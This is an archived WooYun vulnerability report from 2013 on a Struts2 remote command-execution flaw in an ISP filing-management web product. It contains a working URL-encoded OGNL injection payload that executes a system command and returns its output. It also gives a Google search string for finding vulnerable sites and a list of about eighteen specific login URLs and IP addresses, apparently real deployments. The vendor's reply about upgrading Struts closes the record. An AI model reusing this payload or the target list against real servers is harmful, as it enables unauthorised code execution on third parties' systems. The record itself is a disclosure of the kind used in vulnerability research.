乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-25: 细节已通知厂商并且等待厂商处理中 2013-07-29: 厂商已经确认,细节仅向厂商公开 2013-08-01: 细节向第三方安全合作伙伴开放 2013-09-22: 细节向核心白帽子及相关领域专家公开 2013-10-02: 细节向普通白帽子公开 2013-10-12: 细节向实习白帽子公开 2013-10-23: 细节向公众公开
融通在线旗下某web产品命令执行漏洞(通用)
产品是融通在线旗下的 融通在线没找到网站 商务中国也是融通在线的品牌 所以就提给商务中国了ISP备案管理系统 存在struts 2011年的私有函数命令执行漏洞post:
class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23k8team%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23k8team.println%28%23d%29%2c%23k8team.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]
google
intext:欢迎访问企业侧备案系统备案咨询电话
能找到不少
http://beian.bizcn.com/login_login.actionhttp://beian.71.com/login_login.action http://www.100icp.com:18080/beian/login_login.actionhttp://ispapi.dns-china.com:18080/beian/login_login.actionhttp://222.80.184.140:8080/beian/login_login.actionhttp://beian1.8849x.cn/beian/login_login.actionhttp://jinan.icp.chinanetcenter.com/login_login.actionhttp://beian.guilinlife.com:8080/beian/login_login.actionhttp://www.xmcnc.net:8989/beian/login_login.actionhttp://218.83.161.121/beian/login_login.actionhttp://beian.loongo.com/login_login.actionhttp://ba.21nic.cn:18080/login_login.actionhttp://www.unnets.com:18080/beian/login_login.actionhttp://218.246.195.60/beian/login_login.actionhttp://125.39.152.21/login_login.actionhttp://61.152.93.115:5151/beian/login_login.actionhttp://beian.icelit.com/login_login.actionhttp://beian.cnc.71.com/login_login.action
危害等级:高
漏洞Rank:10
确认时间:2013-07-29 10:20
针对strust版本漏洞,已经将strust做升级处理,正在调试中,调试正常后将及时更新正式环境,谢谢您提出宝贵意见及建议,再次感谢。
暂无
